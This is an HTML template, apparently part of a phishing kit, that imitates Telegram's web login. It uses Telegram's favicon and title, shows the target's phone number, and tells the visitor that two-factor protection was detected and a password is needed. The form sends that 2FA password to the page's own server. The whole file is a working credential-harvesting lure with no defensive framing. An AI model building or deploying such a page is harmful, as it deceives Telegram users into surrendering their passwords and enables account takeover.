<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600&display=swap" rel="stylesheet">
    <link rel="icon" href="https://web.telegram.org/z/favicon.svg" type="image/svg+xml">
    <title>Telegram</title>
</head>
<body>
    <section class="container">
        <div class="logo"></div>
        <div class="txt">
            <h1>{{phone}}</h1>
            <p>Two-factor protection detected!
                Enter the password to continue.</p>
        </div>
        {% if error %}
        <p class="alert">{{ error }}</p>
        {% endif %}
        <div class="form">
          <form method="post" action="/confirm/{{phone.lstrip('+')}}" class="input-container ic1">
              <input id="password" class="input" type="password" placeholder=" " name="password" autocomplete="off" />
              <div class="cut"></div>
              <label for="password" class="placeholder">2FA</label>
              <button type="submit" class="next">next</button>
            </form>
        </div>
    </section>

      <style>

body {
    background-color: #212121;
    font-family: 'Poppins', sans-serif;
}

.logo {
    background: url(https://i.ibb.co/Y8123yT/image.png) center no-repeat;
    background-size: 100%;
    height: 150px;
    width: 150px;
}

.container {
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    margin-top: 5%;
    text-align: center;
}

.txt h1 {
    color: white;
    font-size: 2rem;
}

.txt p {
  font-size: 1rem;
  color: rgb(170,170,170);
  width: 360px;
}

.form {
  box-sizing: border-box;
  /* height: 100%; */
  width: 320px;
}

.alert {
  color: #e53935;
}


.input-container {
  height: 50px;
  position: relative;
  width: 100%;
}

.ic1 {
  margin-top: 40px;
}


.input {
  background-color: #212121;
  border: 1px solid rgb(170,170,170);
  border-radius: 12px;
  /* border: 0; */
  box-sizing: border-box;
  color: #eee;
  font-size: 18px;
  height: 100%;
  outline: 0;
  padding: 4px 20px 0;
  width: 100%;
}

.next {
  width: 100%;
  background-color: rgb(135,116,225);
  color: white;
  text-transform: uppercase;
  border-radius: 12px;
  margin-top: 15px;
  height: 100%;
  cursor: pointer;
  border: 0;
  transition: 0.3s;
  font-size: 15px;
}

.next:hover {
  background-color: rgb(93, 66, 202);
  border: 0;
  transition: 0.3s;
}


.input:focus {
    border: 1px solid rgb(118,106,200);

}

.cut {
  background-color: #212121;
  border-radius: 10px;
  height: 20px;
  left: 22px;
  position: absolute;
  top: -20px;
  transform: translateY(0);
  transition: transform 200ms;
  width: 28px;
}

.cut-short {
  width: 50px;
}

.input:focus ~ .cut,
.input:not(:placeholder-shown) ~ .cut {
  transform: translateY(6px) scale(1.1);
}

.placeholder {
  color: rgb(170,170,170);
  font-family: sans-serif;
  left: 20px;
  line-height: 14px;
  pointer-events: none;
  position: absolute;
  transform-origin: 0 50%;
  transition: transform 200ms, color 200ms;
  top: 20px;
}

.input:focus ~ .placeholder,
.input:not(:placeholder-shown) ~ .placeholder {
  transform: translateY(-27px) translateX(4px) scale(0.75);
}

.input:not(:placeholder-shown) ~ .placeholder {
  color: #808097;

}

.input:focus ~ .placeholder {
  color: rgb(118,106,200);
}

 
      </style>
</body>
</html>